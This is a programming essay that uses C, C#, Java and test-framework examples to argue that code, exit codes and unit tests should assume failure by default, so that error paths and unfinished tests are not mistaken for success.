In this article, we will be using the Wikipedia API to retrieve data from Wikipedia. Data scraping has seen a rapid surge owing to the increasing use of data analytics and machine learning tools. The Internet is the single largest source of information, and therefore it is important to know how to fetch data from various sources. And with Wikipedia being one of the largest and most popular sources for information on the Internet, this is a natural place to start.
In this article, we will see how to use Python's Wikipedia API
Once the installation is done, we can use the Wikipedia API in Python to extract information from Wikipedia. In order to call the methods of the Wikipedia module in Python, we need to import it using the following command.
import wikipedia
Searching Titles and Suggestions
The
search() method does a Wikipedia search for a query that is supplied as an argument to it. As a result, this method returns a list of all the article's titles that contain the query. For example:
import wikipedia print(wikipedia.search("Bill"))
Output:
['Bill', 'The Bill', 'Bill Nye', 'Bill Gates', 'Bills, Bills, Bills', 'Heartbeat bill', 'Bill Clinton', 'Buffalo Bill', 'Bill & Ted', 'Kill Bill: Volume 1']
As you see in the output, the searched title along with the related search suggestions are displayed. You can configure the number of search titles returned by passing a value for the
results parameter, as shown here:
import wikipedia print(wikipedia.search("Bill", results=2))
Output:
['Bill', 'The Bill']
The above code prints only 2 search results of the query since that is how many we requested to be returned.
Let's say we need to get the Wikipedia search suggestions for a search title, "Bill Cliton" that is incorrectly entered or has a typo. The
suggest() method returns suggestions related to the search query entered as a parameter to it, or it will return "None" if no suggestions were found.
Let's try it out here:
import wikipedia print(wikipedia.suggest("Bill cliton"))
Output:
bill clinton
You can see that it took our incorrect entry, "Bill cliton", and returned the correct suggestion of "bill clinton".
Extracting Wikipedia Article Summary
We can extract the summary of a Wikipedia article using the
summary() method. The article for which the summary needs to be extracted is passed as a parameter to this method.
Let's extract the summary for "Ubuntu":
print(wikipedia.summary("Ubuntu"))
Output:
Ubuntu ( (listen)) is a free and open-source Linux distribution based on Debian. Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots). Ubuntu is a popular operating system for cloud computing, with support for OpenStack.Ubuntu is released every six months, with long-term support (LTS) releases every two years. The latest release is generates revenue through the sale of premium services related to Ubuntu. Ubuntu is named after the African philosophy of Ubuntu, which Canonical translates as "humanity to others" or "I am what I am because of who we all are".
The whole summary is printed in the output. We can customize the number of sentences in the summary text to be displayed by configuring the
sentences argument of the method.
print(wikipedia.summary("Ubuntu", sentences=2))
Output:
Ubuntu ( (listen)) is a free and open-source Linux distribution based on Debian. Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots).
As you can see, only 2 sentences of Ubuntu's text summary is printed.
However, keep in mind that
wikipedia.summary will raise a "disambiguation error" if the page does not exist or the page is disambiguous. Let's see an example.
print(wikipedia.summary("key"))
The above code throws a
DisambiguationError since there are many articles that would match "key".
Output:
Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/Library/Python/2.7/site-packages/wikipedia/util.py", line 28, in __call__ ret = self._cache[key] = self.fn(*args, **kwargs) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 231, in summary page_info = page(title, auto_suggest=auto_suggest, redirect=redirect) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 276, in page return WikipediaPage(title, redirect=redirect, preload=preload) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 299, in __init__ self.__load(redirect=redirect, preload=preload) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 393, in __load raise DisambiguationError(getattr(self, 'title', page['title']), may_refer_to) wikipedia.exceptions.DisambiguationError: "Key" may refer to: Key (cryptography) Key (lock) Key (map) ...
If you had wanted the summary on a "cryptography key", for example, then you'd have to enter it as the following:
print(wikipedia.summary("Key (cryptography)"))
With the more specific query we now get the correct summary in the output.
Retrieving Full Wikipedia Page Data
In order to get the contents, categories, coordinates, images, links and other metadata of a Wikipedia page, we must first get the Wikipedia page object or the page ID for the page. To do this, the
page() method is used with page the title passed as an argument to the method.
Look at the following example:
wikipedia.page("Ubuntu")
This method call will return a
WikipediaPage object, which we'll explore more in the next few sections.
Extracting Metadata of a Page
To get the complete plain text content of a Wikipedia page (excluding images, tables, etc.), we can use the
content attribute of the
page object.
print(wikipedia.page("Python").content)
Output:.Python was conceived in the late 1980s as a successor to the ABC language. Python 2.0, released 2000, introduced features like list comprehensions and a garbage collection system capable of collecting reference cycles. ...
Similarly, we can get the URL of the page using the
url attribute:
print(wikipedia.page("Python").url)
Output:
We can get the URLs of external links on a Wikipedia page by using the
references property of the
WikipediaPage object.
print(wikipedia.page("Python").references)
Output:
[u';66665771', u'', u'', u'', u'', ...]
The
title property of the
WikipediaPage object can be used to we extract the title of the page.
print(wikipedia.page("Python").title)
Output:
Python (programming language)
Similarly, the
categories attribute can be used to get the list of categories of a Wikipedia page:
print(wikipedia.page("Python").categories)
Output
['All articles containing potentially dated statements', 'Articles containing potentially dated statements from August 2016', 'Articles containing potentially dated statements from December 2018', 'Articles containing potentially dated statements from March 2018', 'Articles with Curlie links', 'Articles with short description', 'Class-based programming languages', 'Computational notebook', 'Computer science in the Netherlands', 'Cross-platform free software', 'Cross-platform software', 'Dutch inventions', 'Dynamically typed programming languages', 'Educational programming languages', 'Good articles', 'High-level programming languages', 'Information technology in the Netherlands', 'Object-oriented programming languages', 'Programming languages', 'Programming languages created in 1991', 'Python (programming language)', 'Scripting languages', 'Text-oriented programming languages', 'Use dmy dates from August 2015', 'Wikipedia articles with BNF identifiers', 'Wikipedia articles with GND identifiers', 'Wikipedia articles with LCCN identifiers', 'Wikipedia articles with SUDOC identifiers']
The
links element of the
WikipediaPage object can be used to get the list of titles of the pages whose links are present in the page.
print(wikipedia.page("Ubuntu").links)
Output
[u'/e/ (operating system)', u'32-bit', u'4MLinux', u'ALT Linux', u'AMD64', u'AOL', u'APT (Debian)', u'ARM64', u'ARM architecture', u'ARM v7', ...]
Finding Pages Based on Coordinates
The
geosearch() method is used to do a Wikipedia geo search using latitude and longitude arguments supplied as float or decimal numbers to the method.
print(wikipedia.geosearch']
As you see, the above method returns articles based on the coordinates provided.
Similarly, we can set the coordinates property of the
page() and get the articles related to the geolocation. For example:
print(wikipedia.page']
Language Settings
You can customize the language of a Wikipedia page to your native language, provided the page exists in your native language. To do so, you can use the
set_lang() method. Each language has a standard prefix code which is passed as an argument to the method. For example, let's get the first 2 sentences of the summary text of "Ubuntu" wiki page in the German language.
wikipedia.set_lang("de") print(wikipedia.summary("ubuntu", sentences=2))
Output
Ubuntu (auch Ubuntu Linux) ist eine Linux-Distribution, die auf Debian basiert. Der Name Ubuntu bedeutet auf Zulu etwa „Menschlichkeit“ und bezeichnet eine afrikanische Philosophie.
You can check the list of currently supported ISO languages along with its prefix, as follows:
print(wikipedia.languages())
Retrieving Images in a Wikipedia Page
The
images list of the
WikipediaPage object can be used to fetch images from a Wikipedia page. For instance, the following script returns the first image from Wikipedia's Ubuntu page:
print(wikipedia.page("ubuntu").images[0])
Output
The above code returns the URL of the image present at index 0 in the Wikipedia page.
To see the image, you can copy and paste the above URL into your browser.
Retreiving Full HTML Page Content
To get the full Wikipedia page in HTML format, you can use the following script:
print(wikipedia.page("Ubuntu").html())
Output
<div class="mw-parser-output"><div role="note" class="hatnote navigation-not-searchable">For the African philosophy, see <a href="/wiki/Ubuntu_philosophy" title="Ubuntu philosophy">Ubuntu philosophy</a>. For other uses, see <a href="/wiki/Ubuntu_(disambiguation)" class="mw-disambig" title="Ubuntu (disambiguation)">Ubuntu (disambiguation)</a>.</div> <div class="shortdescription nomobile noexcerpt noprint searchaux" style="display:none">Linux distribution based on Debian</div> ...
As seen in the output, the entire page in HTML format is displayed. This can take a bit longer to load if the page size is large, so keep in mind that it can raise an
HTMLTimeoutError when a request to the server times out.
Conclusion
In this tutorial, we had a glimpse of using the Wikipedia API for extracting data from the web. We saw how to get a variety of information such as a page's title, category, links, images, and retrieve articles based on geo-locations. | https://stackabuse.com/getting-started-with-pythons-wikipedia-api/ | CC-MAIN-2019-43 | refinedweb | 1,696 | 53.1 |
31115/kubernetes-dashboard-token-login-issue
Hello guys i am having some trouble with loging into dashboard with token. I was googling for 3 days and there are explained the same issues on the internet as mine but with the given answers I couldn't solve my problem.
The problem is: I have installed kubernetes dashboard on my virtual machine. From local browser (from virtual machine) I can easy access to the dashboard with a TOKEN. I can sign in complitely fine, BUT when i want to access to the same dashboard via my computer (not the virtual machine) and i paste TOKEN to where it is required and click Sign IN nothing happens. Can someone please help me how to remotely access to my dashboaard and to solve this issue?
NOTE: Accessing to dashboard (from Virtual Machine (local) and remote from my computer) is working complitely fine but when I want to log in with a token just nothing happens. I don't know why.
I also tried some port forwarding like: ssh -L 8001:localhost:8001 root@<IP> , but did not fix my error.
Accessing localy to dashboard:
Accesing remotely to dashboard (as above, but with the IP of virtual machine): <IP>:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login
Thanks a lot.
Hi Sal!
Not really. I guess that access to dashboard just isn't possible this way.
As someone mentioned below: It cannot be accessed from anywhere other than the master.
try this @Denis,
kubectl proxy --address=master-node-ip --port 8001 --accept-hosts '.*'
How are you getting the token?
Try using this token:
kubectl -n kube-system get secret |grep kubernetes-dashboard-token |cut -f1 -d ' ' | xargs kubectl -n kube-system describe secret
Sarah & Vardhan I also came to the conclusion that accessing to dashboard from anywhere other than the master won't work.
So my solution is: create 1 master (maximal linux install) and 2 nodes (minimal linux install) on the same vCenter and then accessing to my dashboard from my master, where I have installed maximal version with GUI. This is the only way to fix the problem I guess.
Greetings from edureka! Community.
We have reviewed your post and have concluded there is no reason for your post to be flagged. Hence, we have cleared the flag.
Continue to Ask, Learn & Collaborate!
Dashboard should not be exposed publicly using kubectl proxy command as it only allows HTTP connection. For domains other than localhost and 127.0.0.1 it will not be possible to sign in. Nothing will happen after clicking Sign in button on login page.
This article will help you.
You have to ...READ MORE
I had the same issue, struggled for days. ...READ MORE
You’ve created your ServiceAccount on a different ...READ MORE
The installation fails because there is no ...READ MORE
You’re trying to access a private IP. ...READ MORE
To access Kubernetes dashboard, you need to ..
OR
At least 1 upper-case and 1 lower-case letter
Minimum 8 characters and Maximum 50 characters
Already have an account? Sign in. | https://www.edureka.co/community/31115/kubernetes-dashboard-token-login-issue?show=39268 | CC-MAIN-2022-27 | refinedweb | 519 | 65.62 |
Is there any function equivalent to Python's fcntl.ioctl in Java ?
Printable View
Is there any function equivalent to Python's fcntl.ioctl in Java ?
It would help if you told us what that function actually does, or what you need it for, or what you're actually trying to do.
Actually my work is Convert Python Application to Java Application ?
here i have trouble what the following code perform I don't know the code what's doing this code exactly.
def get(self):
self.corrections = fcntl.ioctl(self.joystick, -2145097182, self.corrections)
for n in range(5):
self.correction[n].unpack(self.corrections[(n * 36):((n + 1) * 36)])
Kindly advice me
You have to convert your python code to English (or whatever your first language is) first, then convert that to Java. You can't convert python code to Java code by "translating" one line at a time. Figure out what the program does, then write a program that does it in Java. | http://www.javaprogrammingforums.com/%20whats-wrong-my-code/14604-fcntl-ioctl-equalient-code-java-printingthethread.html | CC-MAIN-2018-09 | refinedweb | 166 | 68.67 |
Macros have a long history in computing and sweet.js may just give you JavaScript any way that you would like to program it.
Sweet.js is a Mozilla project to add a macro facility to JavaScript. While it is true that Mozilla has many projects that never really make much impact, this one is worth knowing about, if only to put languages and the problems they create into perspective.
A macro language is essentially a text processing language and the big problem is that they vary a lot in power. For example, the basic C macro facility is more-or-less automated copy and paste. Simple macro language have almost succeeded in bringing macro languages into disrepute, but sweet.js is a bit more sophisticated.
It is referred to as a "hygienic" macro language because it doesn't pollute the language it manipulates with unnecessary resources. Put simply it doesn't create or use variables in the language it works with. However, sweet.js isn't just a hygienic language it is also a powerful template language which can transform macro code into equivalent JavaScript. You can think of it as a sort of customizable compiler - but this might be over stating the case.
For example, if you want to write def in place of the usual function keyword you can define a macro:
macro def { case $name:ident $params $body => { function $name $params $body } }
and following this a statement like:
def sweet(a) { console.log("Macros are sweet!"); }
is transformed into
function sweet(a) { console.log("Macros are sweet!"); }
Notice that while this example looks like a simple substitution of "function" for "def" the macro defines what happens to whatever follows the "def" in potentially complex ways.
Using macros is a matter of pattern matching, but when macros include conditionals and recursion like sweet.js does then things become very powerful and in principle you could write a compiler using nothing but the macro language.
Of course in this case the intention of sweet.js is to allow you to extend JavaScript in ways that suit your particular style of programming. If you would be happier with JavaScript with a Basic-style for loop then you can write a macro to convert
For i=1 To 10
into
for(var i=1;i<=10;i++)
You could also use sweet.js to implement Domain Specific Languages, DSLs.
Sweet.js is written in JavaScript and can work as a Node.js package. It acts as a compiler which takes in a macro file consisting of macro definitions and code and outputs pure JavaScript. You could say it was another compiler that treats JavaScript as its assembly language but in this case the output should be easy for a human to understand because fo the close and meaningful relationship between the macro and the output.
The project has been going for a month or so and sweet.js is fairly usable with some omissions and bugs. You can also use it with Ruby. The code is open source and you can download it from Github.
Sweet.js
TypeScript - Microsoft's Replacement For JavaScript
Ready to Go - Go Reaches Version 1
JavaScript On the Rise
Dart + Chromium = Dartium
Ceylon Achieves Milestone 1
Eclipse Launches a JDK language [ ... ]
A video from SIGGRAPH 2014 presents a fully automatic approach to realtime facial tracking and animation which doesn't require calibration for different individuals and seems suitable for deployment i [ ... ] | http://i-programmer.info/news/167/4941.html | CC-MAIN-2014-41 | refinedweb | 576 | 62.68 |
Java AWT Package Example
Java AWT Package Example
In this section you will learn about the AWT package of the Java...
This program shows you how to create a frame in java AWT package
Image on Frame in Java AWT
Image on Frame in Java AWT
... on the frame. This
program shows you how to display image in your application... the
image on the frame in your application. These are explained below :
main
Java Frame/ Applet /swing/awt
Java Frame/ Applet /swing/awt I have produced a .exe file with the help of .jar file...................
Now How can I Protect my software( .exe ) file bulid in Java from being Copy and Paste....?????????
please reply
Hiding Frame in Java
Hiding Frame in Java
Introduction
This section illustrates you how to hide the Java Awt
frame... object will be visible. By default Java Awt Form
is in the invisible state
Iconifying and Maximizing a frame in Java
Iconifying and Maximizing a frame in Java
In this section, you will learn about the Iconifying and maximizing a frame in
java. Iconifying means to show a frame in minimized
Java AWT Package Example
Removing the title bar of the Frame in Java
Removing the title bar of the Frame in Java
... how to display the frame or window without title bar in
java. This type of the frame is mostly used to show the splash screen at starting of the application
Java Frame
Java Frame What is the difference between a Window and a Frame
Java Dialogs - Swing AWT
/springlayout.html Dialogs a) I wish to design a frame whose layout mimics... visit the following links:
awt
Java AWT Applet example how to display data using JDBC in awt/applet
How to Create Button on Frame
; frame the topic of Java AWT
package. In the section, from the generated output... a
command button on the Java Awt Frame. There is a program for the best...
How to Create Button on Frame
java - Swing AWT
Java Implementing Swing with Servlet How can i implement the swing with servlet in Java? Can anyone give an Example??
Implementing... {
JFrame frame = new JFrame("Frame in Java Swing");
frame.setSize(400, 400
Java AWT
Java AWT What is meant by controls and what are different types of controls in AWT
What is AWT in java
What is AWT in java
In this section, you will learn about the java.awt.*;
package.../api/java/awt/package-summary.html
java-awt - Java Beginners
java-awt how to include picture stored on my machine to a java frame...());
JFrame frame = new JFrame();
frame.getContentPane().add(panel... information,
Java Example projects about STRUTS
Java Example projects about STRUTS Hai...
I completed MCA but i have no job in my hands.
But i do some small projects about STRUTS.
Please send me some example projects about STRUTS.
Please visit the following link.
About java
About java how we insert our database data into the jTable in java... in java
Hi Friend,
Try the following code:
import java.io.*;
import...);
}
public static void main(String arg[])
{
try
{
JTableDatabase frame
Java - Swing AWT
Java Hi friend,read for more information,
Creating a Frame
;
This program shows you how to create a frame in Java Swing
Application. The frame
in java works like the main window where your components... and decoration for the frame.
For creating java standalone application you
must
Event handling in Java AWT
Event handling in Java AWT
... events in java awt. Here, this
is done through the java.awt.*; package
of java. Events are the integral
part of the java platform. You can see the concepts
awt - Swing AWT
,
For solving the problem visit to :
Thanks... market chart this code made using "AWT" . in this chart one textbox when user - Swing AWT
What is Java Swing AWT What is Java Swing AWT AWT
Java AWT What is the relationship between the Canvas class and the Graphics class
java - Swing AWT
*;
import javax.swing.*;
class Maruge extends Frame implements ActionListener...*;
class Maruge extends Frame {
Label lab=new Label(" ");
Label lab1=new Label
java - Swing AWT
frame layout
{
setLayout( new FlowLayout() ); // set frame layout
// JLabel constructor with a string argument
java - Swing AWT
static void main(String arg[])
{
try
{
Form frame=new Form
java - Swing AWT
) {
JFrame frame = new JFrame("Upload Demo");
JPanel panel = new Upload
("FORM");
}
public static void main(String arg[]) {
LoginDemo frame=new
awt - Java Interview Questions
awt what is the difference between awt and swings Hi friend,
These are basically the main differences between awt and swing.
1.swing components sits on the top of AWT components and do the wiork.
2.AWT
BorderLayout Example In java
BorderLayout Example In java
...
BorderLayout in java awt package. The Border Layout is arranging and resizing components to
set in five position which is used in this program. The java program uses
How to save data - Swing AWT
to :
Thanks...How to save data Hi,
I have a problem about how to save data...",
java awt components - Java Beginners
java awt components how to make the the button being active at a time..?
ie two or more buttons gets activated by click at a time
Collection frame work - Java Beginners
Collection frame work How to a sort a list of objects ordered by an attribute of the object
Java AWT Components
Java AWT Components
... components available in
the Java AWT package for developing user interface for your program.
Following some components of Java AWT are explained :
Labels
slider - Swing AWT
://
Thanks... {
public static void main(String args[]) {
JFrame frame = new JFrame("JSlider Example");
Container content = frame.getContentPane();
JSlider slider
dataentry
java
java how to connect one frame to another frame by using awt or swings?`print("code sample
frame with title free hand writing
://
Thanks...frame with title free hand writing create frame with title free hand writing, when we drag the mouse the path of mouse pointer must draw line ao arc
scrolling a drawing..... - Swing AWT
information. a drawing..... I am using a canvas along with other components like JTable over a frame
the drawing which i am going to show over canvas
creating a modal frame - Java Beginners
creating a modal frame i have a JFrame with 2 textfields. i want that this frame should open in a modal mode. how to do this? please tell. thanks
Java Swings-awt - Swing AWT
Java Swings-awt Hi,
Thanks for posting the Answer... I need to design a tool Bar which looks like a Formating toolbar in MS-Office Winword(Standard & Formating) tool Bar.
Please help me... Thanks in Advance
About Java
About Java Hi,
Can anyone tell me the About Java programming language? How a c programmer can learn Java development techniques?
Thanks
Hi,
Read about java at.
about enum - Java Beginners
about enum hi all,
please tell me about "enum" and explain with example. And its use in OOP.
Thanks
awt jdbc
awt jdbc programm in java to accept the details of doctor (dno,dname,salary)user & insert it into the database(use prerparedstatement class&awt
about swings - Java Beginners
:
Hope...about swings Dear sir,Good evening,
i am doing mca sir,i am doing the project in swings,so plz provide the material about swings sir
Ask Questions?
If you are facing any programming issue, such as compilation errors or not able to find the code you are looking for.
Ask your questions, our development team will try to give answers to your questions. | http://www.roseindia.net/tutorialhelp/comment/98655 | CC-MAIN-2013-20 | refinedweb | 1,244 | 64 |
I currently have a volume spanned by a few million every unevenly spaced particles and each particle has an attribute (potential, for those who are curious) that I want to calculate the local force (acceleration) for.
np.gradient only works with evenly spaced data and I looked here: Second order gradient in numpy where interpolation is necessary but I could not find a 3D spline implementation in Numpy.
Some code that will produce representative data:
import numpy as np
from scipy.spatial import cKDTree
x = np.random.uniform(-10, 10, 10000)
y = np.random.uniform(-10, 10, 10000)
z = np.random.uniform(-10, 10, 10000)
phi = np.random.uniform(-10**9, 0, 10000)
kdtree = cKDTree(np.c_[x,y,z])
_, index = kdtree.query([0,0,0], 32) #find 32 nearest particles to the origin
#find the gradient at (0,0,0) by considering the 32 nearest particles?
Intuitively, for the derivate wrt one datapoint, I would do the following
data=phi[x_id-1:x_id+1, y_id-1:y_id+1, z_id-1:z_id+1]. The approach with the kdTre looks very nice, of course you can use that for a subset of the data, too.
This would be a simple solution to your problem. However it would probably be very slow.
EDIT:
In fact this seems to be the usual method:
The accepted answer talks about deriving an interpolating polynomial. Although apparently that polynomial should cover all the data (Vandermonde matrix). For you that is impossible, too much data. Taking a local subset seems very reasonable. | https://codedump.io/share/gHe2uT1NHzAD/1/calculating-a-3d-gradient-with-unevenly-spaced-points | CC-MAIN-2017-47 | refinedweb | 256 | 50.63 |
Tax
Have a Tax Question? Ask a Tax Expert
Hello and thank you for using Just Answer,
Partnerships, S Corporations and limited liability companies may file, on behalf of their nonresident partners, shareholders, or members, a unified return (Form 765) thereby relieving these persons of the responsibility of filing a Virginia nonresident individual return.As a nonresident with no other income in Virginia you are not required to file a Virginia return, but if you choose to file the Nonresident return to carry forward your losses your allocation will be zero.Just like federal, Virginia requires that partnerships with nonresidents withhold throughout the year on income that would attributable to the nonresident partner, even if no payment is actually disbursed to the nonresident partner. In that case you would file a return to request the withholding in excess of tax liability.
As I am the only non resident partner they will not file a form 765.
Your answer appears to agree with the statements in my question to you. Is that right?
Well, if the partnership will not file then you are not required to file if your income for Virginia falls below the level to file. If all your partnership is loss then you are not required to file.
I agreed with the part about allocation percentage and I thanked you for a positive rating, in advance
I said they will not file a 765 form (because I am the only non resident partner, hence they can't file that form which is a grouping of partnerss), but they filed a VK-1 on my behalf. | http://www.justanswer.com/tax/73ouk-good-afternoon-i-non-us-resident-partner.html | CC-MAIN-2016-40 | refinedweb | 267 | 55.68 |
URGENT info for Linux users - new updater tool version v1.10.0.b3 - FiPy device reset
A new version of the firmware update tool for Linux has been released.
This fixes an urgent issue causing FiPy and LoPy4 devices not to have proper Sigfox credentials assigned when using the dialog based cli update script on Linux.
I have identified 16 FiPy devices in our database that are currently affected by this issue. Unfortunately I will have to remove those 16 devices from our database, and if you have been affected by this issue, you will have to select your device details again during the next firmware update.
If you experience any issues following your device reset, please email support@pycom.io
@sioo I'm not sure how it happened but you're right, the LoPy4 option has disappeared from the latest script... I'll check this now and will get a new script uploaded as soon as possible.
Please first of all send me you mac address. You can get this from the REPL via:
import machine,binascii
binascii.hexlify(machine.unique_id())
Please send me the output of this command via personal message or via email to support@pycom.io and I will reset your device.
Can you please check if the command python lopyupdate.py is working? This should get you the GUI version.
Otherwise please wait until I have checked the script to make sure the LoPy4 selection is working properly.
LoPy4 is not shown in the ask device dialog. Looked through the code and noticed that LoPy4 is not present as an selection in
device_dialog().
Unfortunately, before doing the above and added LoPy4 as selection, I picked Lopy for my LoPy4 so I got that firmware instead. Now when I select LoPy4 I still get the lopy firmware. But I tried messing around setting
firmware_typeto
lopy4.lopy4 with esp32.868, and sure enough I got the Lopy4 firmware but when I try retrieving sigfox device id it reads as
ffffffffand sigfox pac number
ffffffffffffffff, which cant be right?
I was one of the 16th. No problems here. Good work. | https://forum.pycom.io/topic/2507/urgent-info-for-linux-users-new-updater-tool-version-v1-10-0-b3-fipy-device-reset/ | CC-MAIN-2021-04 | refinedweb | 352 | 74.79 |
I am suppose to..
Write a program that asks for the weight of the package and the distance it is to be shipped and then displays the charges.
weight of package in kg rates per 500 miles shipped
2 kg or less $1.10
over 2kg but not more than 6kg $2.20
over 6kg but not more than 10 kg $3.70
over 10kg but not more than 20 kg $4.80
so far i have this...and when i compiled it it is all wrong..
#include<iostream> #include<iomanip> using namespace std; int main() { float weight, distance, rate; cout << "Enter the weight of the package."; cin >> weight; cout << "Enter the distance to be shipped."; cin >> distance; if ( weight <= 2kg ) rate = $1.10; if ( weight > 2kg && weight < 6kg ) rate = $2.20; if ( weight > 6kg && weight < 10kg ) rate = $3.70; if ( weight > 10kg && weight < 20 kg ) rate = $4.80;
** Edit **
| http://www.dreamincode.net/forums/topic/133376-equation-for-calculation-of-shipping-charges/ | CC-MAIN-2016-26 | refinedweb | 150 | 103.73 |
Re: Multiple NET apps under 1 domain
- From: "nospam" <no@xxxxxxxx>
- Date: Fri, 05 Oct 2007 01:44:16 GMT
Patrice,
Thanks for your reply.
I have bitten the bullet and merged the 2 VS solutions into 1.
I guess I am an old crusty C++ programmer and developed the 2 individual
solutions from habit.
In regards to IIS, I use Visual Studio to display my applications in a
browser.
When I do this a process starts up locally named "Visual Studio Development
Server".
I guess that is acting as IIS.
Regards,
bruce
"Patrice" <> wrote in message
news:eN5M%23qqBIHA.1056@xxxxxxxxxxxxxxxxxxxxxxx
My personal preferences would be :
- to use a virtual dir so that each application is in its own physical
directory (and not one as a subfolder in the main one)
- to combine both
- to deploy them NOT using the publish functionality (you could likely use
FTP).
As a side note if you don"t have access to IIS how could you anyway define
the /admin directory as being an IIS application ?
Good luck.
--
Patrice
"nospam" <no@xxxxxxxx> a écrit dans le message de news:
TK8Ni.11489$ht5.3885@xxxxxxxxxxx
Thanks for the reply Patrice.
Yes I do have 2 apps. I don't have access to IIS. I do my development
using VS 2005 and their local pseudo IIS server.
I have 2 VS solutions which need to be published to the same domain.
I could combine the two ( and sort out all of the connection string
possible namespace collisions).
I was looking for the ability to maintain 2 VS solutions that point to
the same domain - for example for the world only for DBA
It doesn't look like the publish functionality supports this intuitively.
I dk.
"Patrice" <> wrote in message
news:ubUC2JqBIHA.4200@xxxxxxxxxxxxxxxxxxxxxxx
Looks like you want to create two distinct applications. My personal
preference would be likely to put each one in its own folder and use a
virtual folder inside the main web application to map /admin to the
location for the admin application (also defined as a web application).
See :
--
Patrice
"nospam" <no@xxxxxxxx> a écrit dans le message de news:
N68Ni.30774$jC5.27661@xxxxxxxxxxx
Hello everyone -
Newbie here with another dumb question :-)
I want to have several apps under 1 domain - basically the domain root
for general users and then an "admin" folder with a database utility
So the world will go to (Default.aspx) and see the
website and maybe fill out a form which is stored in a db.
The admin dba will go to and do
his/her stuff.
But if I set this up ( in 2 different VS 2005 solutions), when I
publish the admin app it erases the generalusers folder. During
publish there is a dialog box that comes up that asks is it ok to
erase. If I say 'no' then the publish fails.
How do I set this up?
There also seems to be a 'precompileapp.config' file which is written
to the domain root which I think will interfere with the generalusers
app.
How do I stop the admin publishing from deleting everything in the root
folder?
Many thanks in advance.
Regards,
bruce
.
- References:
- Multiple NET apps under 1 domain
- From: nospam
- Re: Multiple NET apps under 1 domain
- From: Patrice
- Re: Multiple NET apps under 1 domain
- From: nospam
- Re: Multiple NET apps under 1 domain
- From: Patrice
- Prev by Date: RE: HttpModule Init method invoked on every request
- Next by Date: Managing multiple data source connection string parameter in Web.config
- Previous by thread: Re: Multiple NET apps under 1 domain
- Next by thread: Download timeout after ~15 min
- Index(es): | http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.aspnet/2007-10/msg00654.html | crawl-002 | refinedweb | 611 | 62.58 |
Assume failure by default. Chris Oldwood considers various fail cases.
Two roads diverged in a wood, and I –I took the one less travelled by,And that has made all the difference.
~ Robert Frost
Despite being written in the early part of the 20th century, I often wonder if Robert Frost’s famous poem might actually have been about programming. Unless you’re writing a trivial piece of code, every function has a happy path and a number of potential error paths. If you’re the optimistic kind of programmer, you’ll likely take the well trodden path and focus on the happy outcome and hope that no awkward scenarios turn up. This path is exemplified in the original version of that classic first program which displays “hello, world!” on the console:
main() { printf("hello, world\n"); }
A standards-conforming version of this classic C program requires the
main function to be declared with an
int return type to remind us that we need to inform the invoker of any problems, but luckily we get to remain optimistic as we can elide any return value (only for a function named
main) and happily accept the default –
0. Consequently, irrespective of whether or not the
printf statement actually works, we’re going to tell the caller that everything was hunky-dory.
The classic C version relies on a spot of ‘legal slight-of-hand’ to allow you to put the program’s return value out of mind whereas C# and Java needed to find another way to let you ignore it so they allow you to declare
main without a return type at all:
public class Program { public static void Main(...) { // print "Hello World!" } }
Of course, these languages use exceptions internally to signal errors so it doesn’t matter, right? Well, earlier versions of Java would return
0 if an uncaught exception propagated through
main so you can’t always rely on the language runtime to act in your best interests [Wilson10]. Even with .Net you can experience some very negative exit codes when things go south which will make a mockery of that tried-and-tested approach to batch-file error handling everyone grew up with:
IF ERRORLEVEL 1
Unless you know that
Main can also return an exit code I don’t think it should be that surprising that people have resorted to silencing those pesky errors with an all-encompassing
try/
catch block:
public static void Main(...) { try { // Lots of cool application logic. } catch { // Write message to stderr. } }
I wonder if this pattern is more common than even I’ve experienced as PowerShell has taken the unconventional approach of treating any output on the standard error stream as a sign that a process has failed in some way. This naturally causes a whole different class of errors on the other side of the fence that could be considered worse than ‘the cure’.
Back in the world of C and C++ we can be pro-active and acknowledge our opportunity to fail but are we still being overly optimistic by starting out by assuming success?
int main(int argv, char **argv) { int result = EXIT_SUCCESS; // Lots of cool application logic. return result; }
It’s generally accepted that small focused functions are preferable to long rambling ones but it’s still not that uncommon to need to write some non-trivial conditional logic. When that logic changes over time (in the absence of decent test coverage) what are the chances of a false positive? When it comes to handling error paths, I’d posit that it’s categorically not zero.
The trouble with error paths are that they are frequently less travelled and therefore far less tested. A bug in handling errors where the flow of control is not correctly diverted can lead to other failures later on which are then harder to diagnose as you’ll be working on the assumption of some earlier step having completed successfully. In contrast, a false negative should cause the software to fail faster which may be easier to diagnose and fix. To wit, assume failure by default:
int result = EXIT_FAILURE;
The term ‘defensive programming’ is one which was well intentioned, and requires an acknowledgement of failure to allow robust code to be written, but it has also been used to cover a multitude of sins – counter-intuitively making our lives harder, not easier. It stems from a time when development cycles were long, releases were infrequent, and patching was expensive. In a modern software delivery process Mean Time to Recovery is often valued more highly than Mean Time to Fail.
Another area where I find an overly optimistic viewpoint is with test frameworks. Take this simple test, which does nothing:
[Test] public void doing_nothing_is_better_than_being_ busy_doing_nothing() { }
Plato once said that an empty vessel makes the loudest sound, and yet a test which makes no assertions is usually silent on the matter. Every test framework I’ve encountered makes the optimistic assumption that as long as your code doesn’t blow up, then it’s correct, irrespective of whether or not you’ve even made any attempt to assert that the correct behaviour has occurred. This is awkward because forgetting to finish writing the test (it happens more often than you might think) is indistinguishable from a passing test.
When practising TDD, the first step is to write a failing test. This is not some form of training wheels to help you get used to the process, it’s fundamental in helping you ensure that what you end up with is working code and test coverage for the future. Failing by default brings clarity around what it means to succeed, or in a modern agile parlance – what is the definition of ‘done’?
In those very rare cases where the outcome cannot be expressed as the absence of some specific operation occurring, there are always the following constructs to make it clear to the reader that you didn’t just forget to finish writing the test:
Assert.Pass(); Assert.That(. . ., Throws.Nothing);
